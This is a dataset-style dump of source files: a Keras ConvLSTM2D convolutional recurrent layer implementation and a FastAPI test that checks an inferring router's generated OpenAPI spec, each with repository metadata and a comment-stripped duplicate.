ones = self.conv_step(ones, K.zeros(self.W_shape),
border_mode=self.border_mode)
ones = ones + 1
B_U = [K.in_train_phase(K.dropout(ones, self.dropout_U), ones)
for _ in range(4)]
constants.append(B_U)
else:
constants.append([K.cast_to_floatx(1.) for _ in range(4)])
if 0 < self.dropout_W < 1:
ones = K.zeros_like(x)
ones = K.sum(ones, axis=1)
ones = ones + 1
B_W = [K.in_train_phase(K.dropout(ones, self.dropout_W), ones)
for _ in range(4)]
constants.append(B_W)
else:
constants.append([K.cast_to_floatx(1.) for _ in range(4)])
return constants
def get_config(self):
config = {'nb_filter': self.nb_filter,
'nb_row': self.nb_row,
'nb_col': self.nb_col,
'init': self.init.__name__,
'inner_init': self.inner_init.__name__,
'forget_bias_init': self.forget_bias_init.__name__,
'activation': self.activation.__name__,
'dim_ordering': self.dim_ordering,
'border_mode': self.border_mode,
'inner_activation': self.inner_activation.__name__}
base_config = super(ConvLSTM2D, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
| 42.420744
| 96
| 0.564562
|
from .. import backend as K
from .. import activations, initializations, regularizers
import numpy as np
from ..engine import Layer, InputSpec
from ..utils.np_utils import conv_output_length
import warnings
class ConvRecurrent2D(Layer):
def __init__(self, weights=None, nb_row=None, nb_col=None, nb_filter=None,
return_sequences=False, go_backwards=False, stateful=False,
dim_ordering=None, **kwargs):
self.return_sequences = return_sequences
self.go_backwards = go_backwards
self.stateful = stateful
self.initial_weights = weights
self.nb_row = nb_row
self.nb_col = nb_col
self.nb_filter = nb_filter
self.dim_ordering = dim_ordering
self.input_spec = [InputSpec(ndim=5)]
super(ConvRecurrent2D, self).__init__(**kwargs)
def compute_mask(self, input, mask):
if self.return_sequences:
return mask
else:
return None
def get_output_shape_for(self, input_shape):
if self.dim_ordering == 'th':
rows = input_shape[3]
cols = input_shape[4]
elif self.dim_ordering == 'tf':
rows = input_shape[2]
cols = input_shape[3]
else:
raise ValueError('Invalid dim_ordering:', self.dim_ordering)
rows = conv_output_length(rows, self.nb_row,
self.border_mode, self.subsample[0])
cols = conv_output_length(cols, self.nb_col,
self.border_mode, self.subsample[1])
if self.return_sequences:
if self.dim_ordering == 'th':
return (input_shape[0], input_shape[1],
self.nb_filter, rows, cols)
elif self.dim_ordering == 'tf':
return (input_shape[0], input_shape[1],
rows, cols, self.nb_filter)
else:
if self.dim_ordering == 'th':
return (input_shape[0], self.nb_filter, rows, cols)
elif self.dim_ordering == 'tf':
return (input_shape[0], rows, cols, self.nb_filter)
def step(self, x, states):
raise NotImplementedError
def get_constants(self, X, train=False):
return None
def get_initial_states(self, X):
initial_state = K.zeros_like(X)
initial_state = K.sum(initial_state, axis=1)
initial_state = self.conv_step(initial_state, K.zeros(self.W_shape),
border_mode=self.border_mode)
initial_states = [initial_state for _ in range(2)]
return initial_states
def preprocess_input(self, x):
return x
def call(self, x, mask=None):
assert K.ndim(x) == 5
input_shape = self.input_spec[0].shape
unroll = False
if self.stateful:
initial_states = self.states
else:
initial_states = self.get_initial_states(x)
constants = self.get_constants(x)
preprocessed_input = self.preprocess_input(x)
last_output, outputs, states = K.rnn(self.step, preprocessed_input,
initial_states,
go_backwards=self.go_backwards,
mask=mask,
constants=constants,
unroll=unroll,
input_length=input_shape[1])
if self.stateful:
self.updates = []
for i in range(len(states)):
self.updates.append((self.states[i], states[i]))
if self.return_sequences:
return outputs
else:
return last_output
def get_config(self):
config = {'return_sequences': self.return_sequences,
'go_backwards': self.go_backwards,
'stateful': self.stateful}
if self.stateful:
config['batch_input_shape'] = self.input_spec[0].shape
base_config = super(ConvRecurrent2D, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
class ConvLSTM2D(ConvRecurrent2D):
def __init__(self, nb_filter, nb_row, nb_col,
init='glorot_uniform', inner_init='orthogonal',
forget_bias_init='one', activation='tanh',
inner_activation='hard_sigmoid',
dim_ordering='default',
border_mode='valid', subsample=(1, 1),
W_regularizer=None, U_regularizer=None, b_regularizer=None,
dropout_W=0., dropout_U=0., **kwargs):
if dim_ordering == 'default':
dim_ordering = K.image_dim_ordering()
if dim_ordering not in {'tf', 'th'}:
raise ValueError('dim_ordering must be in {tf,th}', dim_ordering)
self.nb_filter = nb_filter
self.nb_row = nb_row
self.nb_col = nb_col
self.init = initializations.get(init)
self.inner_init = initializations.get(inner_init)
self.forget_bias_init = initializations.get(forget_bias_init)
self.activation = activations.get(activation)
self.inner_activation = activations.get(inner_activation)
self.border_mode = border_mode
self.subsample = subsample
if dim_ordering == 'th':
warnings.warn('Be carefull if used with convolution3D layers:\n'
'th in convolution 3D corresponds to '
'(samples, channels, conv_dim1, conv_dim2,'
'conv_dim3)\n'
'while for this network it corresponds to: '
'(samples, time, channels, rows, cols)')
self.dim_ordering = dim_ordering
kwargs['nb_filter'] = nb_filter
kwargs['nb_row'] = nb_row
kwargs['nb_col'] = nb_col
kwargs['dim_ordering'] = dim_ordering
self.W_regularizer = regularizers.get(W_regularizer)
self.U_regularizer = regularizers.get(U_regularizer)
self.b_regularizer = regularizers.get(b_regularizer)
self.dropout_W, self.dropout_U = dropout_W, dropout_U
if self.dropout_W or self.dropout_U:
self.uses_learning_phase = True
super(ConvLSTM2D, self).__init__(**kwargs)
def build(self, input_shape):
self.input_spec = [InputSpec(shape=input_shape)]
if self.dim_ordering == 'th':
stack_size = input_shape[2]
self.W_shape = (self.nb_filter, stack_size,
self.nb_row, self.nb_col)
elif self.dim_ordering == 'tf':
stack_size = input_shape[4]
self.W_shape = (self.nb_row, self.nb_col,
stack_size, self.nb_filter)
else:
raise ValueError('Invalid dim_ordering:', self.dim_ordering)
if self.dim_ordering == 'th':
self.W_shape1 = (self.nb_filter, self.nb_filter,
self.nb_row, self.nb_col)
elif self.dim_ordering == 'tf':
self.W_shape1 = (self.nb_row, self.nb_col,
self.nb_filter, self.nb_filter)
if self.stateful:
self.reset_states()
else:
self.states = [None, None, None, None]
self.W_i = self.init(self.W_shape, name='{}_W_i'.format(self.name))
self.U_i = self.inner_init(self.W_shape1,
name='{}_U_i'.format(self.name))
self.b_i = K.zeros((self.nb_filter,), name='{}_b_i'.format(self.name))
self.W_f = self.init(self.W_shape, name='{}_W_f'.format(self.name))
self.U_f = self.inner_init(self.W_shape1,
name='{}_U_f'.format(self.name))
self.b_f = self.forget_bias_init((self.nb_filter,),
name='{}_b_f'.format(self.name))
self.W_c = self.init(self.W_shape, name='{}_W_c'.format(self.name))
self.U_c = self.inner_init(self.W_shape1,
name='{}_U_c'.format(self.name))
self.b_c = K.zeros((self.nb_filter,), name='{}_b_c'.format(self.name))
self.W_o = self.init(self.W_shape, name='{}_W_o'.format(self.name))
self.U_o = self.inner_init(self.W_shape1,
name='{}_U_o'.format(self.name))
self.b_o = K.zeros((self.nb_filter,), name='{}_b_o'.format(self.name))
self.trainable_weights = [self.W_i, self.U_i, self.b_i,
self.W_c, self.U_c, self.b_c,
self.W_f, self.U_f, self.b_f,
self.W_o, self.U_o, self.b_o]
self.W = K.concatenate([self.W_i, self.W_f, self.W_c, self.W_o])
self.U = K.concatenate([self.U_i, self.U_f, self.U_c, self.U_o])
self.b = K.concatenate([self.b_i, self.b_f, self.b_c, self.b_o])
self.regularizers = []
if self.W_regularizer:
self.W_regularizer.set_param(self.W)
self.regularizers.append(self.W_regularizer)
if self.U_regularizer:
self.U_regularizer.set_param(self.U)
self.regularizers.append(self.U_regularizer)
if self.b_regularizer:
self.b_regularizer.set_param(self.b)
self.regularizers.append(self.b_regularizer)
if self.initial_weights is not None:
self.set_weights(self.initial_weights)
del self.initial_weights
self.built = True
def reset_states(self):
assert self.stateful, 'Layer must be stateful.'
input_shape = self.input_spec[0].shape
output_shape = self.get_output_shape_for(input_shape)
if not input_shape[0]:
raise ValueError('If a RNN is stateful, a complete ' +
'input_shape must be provided ' +
'(including batch size).')
if self.return_sequences:
out_row, out_col, out_filter = output_shape[2:]
else:
out_row, out_col, out_filter = output_shape[1:]
if hasattr(self, 'states'):
K.set_value(self.states[0],
np.zeros((input_shape[0],
out_row, out_col, out_filter)))
K.set_value(self.states[1],
np.zeros((input_shape[0],
out_row, out_col, out_filter)))
else:
self.states = [K.zeros((input_shape[0],
out_row, out_col, out_filter)),
K.zeros((input_shape[0],
out_row, out_col, out_filter))]
def conv_step(self, x, W, b=None, border_mode='valid'):
input_shape = self.input_spec[0].shape
conv_out = K.conv2d(x, W, strides=self.subsample,
border_mode=border_mode,
dim_ordering=self.dim_ordering,
image_shape=(input_shape[0],
input_shape[2],
input_shape[3],
input_shape[4]),
filter_shape=self.W_shape)
if b:
if self.dim_ordering == 'th':
conv_out = conv_out + K.reshape(b, (1, self.nb_filter, 1, 1))
elif self.dim_ordering == 'tf':
conv_out = conv_out + K.reshape(b, (1, 1, 1, self.nb_filter))
else:
raise ValueError('Invalid dim_ordering:', self.dim_ordering)
return conv_out
def conv_step_hidden(self, x, W, border_mode='valid'):
input_shape = self.input_spec[0].shape
output_shape = self.get_output_shape_for(input_shape)
if self.return_sequences:
out_row, out_col, out_filter = output_shape[2:]
else:
out_row, out_col, out_filter = output_shape[1:]
conv_out = K.conv2d(x, W, strides=(1, 1),
border_mode=border_mode,
dim_ordering=self.dim_ordering,
image_shape=(input_shape[0],
out_row, out_col,
out_filter),
filter_shape=self.W_shape1)
return conv_out
def step(self, x, states):
assert len(states) == 4
h_tm1 = states[0]
c_tm1 = states[1]
B_U = states[2]
B_W = states[3]
x_i = self.conv_step(x * B_W[0], self.W_i, self.b_i,
border_mode=self.border_mode)
x_f = self.conv_step(x * B_W[1], self.W_f, self.b_f,
border_mode=self.border_mode)
x_c = self.conv_step(x * B_W[2], self.W_c, self.b_c,
border_mode=self.border_mode)
x_o = self.conv_step(x * B_W[3], self.W_o, self.b_o,
border_mode=self.border_mode)
h_i = self.conv_step_hidden(h_tm1 * B_U[0], self.U_i,
border_mode='same')
h_f = self.conv_step_hidden(h_tm1 * B_U[1], self.U_f,
border_mode='same')
h_c = self.conv_step_hidden(h_tm1 * B_U[2], self.U_c,
border_mode='same')
h_o = self.conv_step_hidden(h_tm1 * B_U[3], self.U_o,
border_mode='same')
i = self.inner_activation(x_i + h_i)
f = self.inner_activation(x_f + h_f)
c = f * c_tm1 + i * self.activation(x_c + h_c)
o = self.inner_activation(x_o + h_o)
h = o * self.activation(c)
return h, [h, c]
def get_constants(self, x):
constants = []
if 0 < self.dropout_U < 1:
ones = K.zeros_like(x)
ones = K.sum(ones, axis=1)
ones = self.conv_step(ones, K.zeros(self.W_shape),
border_mode=self.border_mode)
ones = ones + 1
B_U = [K.in_train_phase(K.dropout(ones, self.dropout_U), ones)
for _ in range(4)]
constants.append(B_U)
else:
constants.append([K.cast_to_floatx(1.) for _ in range(4)])
if 0 < self.dropout_W < 1:
ones = K.zeros_like(x)
ones = K.sum(ones, axis=1)
ones = ones + 1
B_W = [K.in_train_phase(K.dropout(ones, self.dropout_W), ones)
for _ in range(4)]
constants.append(B_W)
else:
constants.append([K.cast_to_floatx(1.) for _ in range(4)])
return constants
def get_config(self):
config = {'nb_filter': self.nb_filter,
'nb_row': self.nb_row,
'nb_col': self.nb_col,
'init': self.init.__name__,
'inner_init': self.inner_init.__name__,
'forget_bias_init': self.forget_bias_init.__name__,
'activation': self.activation.__name__,
'dim_ordering': self.dim_ordering,
'border_mode': self.border_mode,
'inner_activation': self.inner_activation.__name__}
base_config = super(ConvLSTM2D, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
| true
| true
|
1c3ebae06ecaeff2cc3672f54ae2f7f6aacdadc3
| 1,642
|
py
|
Python
|
tests/test_fastapi_utils/test_features/test_inferring_router.py
|
dmontagu/fastapi-auth
|
d0e86774f66bd43e80376de19bdf034eb228dc07
|
[
"MIT"
] | 87
|
2019-12-18T05:43:25.000Z
|
2022-03-30T20:04:11.000Z
|
tests/test_fastapi_utils/test_features/test_inferring_router.py
|
dmontagu/fastapi-auth
|
d0e86774f66bd43e80376de19bdf034eb228dc07
|
[
"MIT"
] | 2
|
2020-08-07T05:17:18.000Z
|
2021-09-14T03:20:04.000Z
|
tests/test_fastapi_utils/test_features/test_inferring_router.py
|
dmontagu/fastapi-auth
|
d0e86774f66bd43e80376de19bdf034eb228dc07
|
[
"MIT"
] | 7
|
2020-03-08T17:14:33.000Z
|
2022-01-01T21:38:47.000Z
|
from fastapi import FastAPI
from fastapi_auth.fastapi_util.features.inferring_router import InferringRouter
openapi_spec = {
"info": {"title": "Fast API", "version": "0.1.0"},
"openapi": "3.0.2",
"paths": {
"/1": {
"get": {
"operationId": "endpoint_1_1_get",
"responses": {
"200": {
"content": {
"application/json": {"schema": {"title": "Response " "Endpoint 1 1 Get", "type": "string"}}
},
"description": "Successful " "Response",
}
},
"summary": "Endpoint 1",
}
},
"/2": {
"get": {
"operationId": "endpoint_2_2_get",
"responses": {
"200": {
"content": {
"application/json": {"schema": {"title": "Response " "Endpoint 2 2 Get", "type": "integer"}}
},
"description": "Successful " "Response",
}
},
"summary": "Endpoint 2",
}
},
},
}
def test_inferring_router() -> None:
inferring_router = InferringRouter()
@inferring_router.get("/1")
def endpoint_1() -> str: # pragma: no cover
return ""
@inferring_router.get("/2", response_model=int)
def endpoint_2() -> str: # pragma: no cover
return ""
app = FastAPI()
app.include_router(inferring_router)
assert app.openapi() == openapi_spec
| 29.854545
| 120
| 0.433618
|
from fastapi import FastAPI
from fastapi_auth.fastapi_util.features.inferring_router import InferringRouter
openapi_spec = {
"info": {"title": "Fast API", "version": "0.1.0"},
"openapi": "3.0.2",
"paths": {
"/1": {
"get": {
"operationId": "endpoint_1_1_get",
"responses": {
"200": {
"content": {
"application/json": {"schema": {"title": "Response " "Endpoint 1 1 Get", "type": "string"}}
},
"description": "Successful " "Response",
}
},
"summary": "Endpoint 1",
}
},
"/2": {
"get": {
"operationId": "endpoint_2_2_get",
"responses": {
"200": {
"content": {
"application/json": {"schema": {"title": "Response " "Endpoint 2 2 Get", "type": "integer"}}
},
"description": "Successful " "Response",
}
},
"summary": "Endpoint 2",
}
},
},
}
def test_inferring_router() -> None:
inferring_router = InferringRouter()
@inferring_router.get("/1")
def endpoint_1() -> str:
return ""
@inferring_router.get("/2", response_model=int)
def endpoint_2() -> str:
return ""
app = FastAPI()
app.include_router(inferring_router)
assert app.openapi() == openapi_spec
| true
| true
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.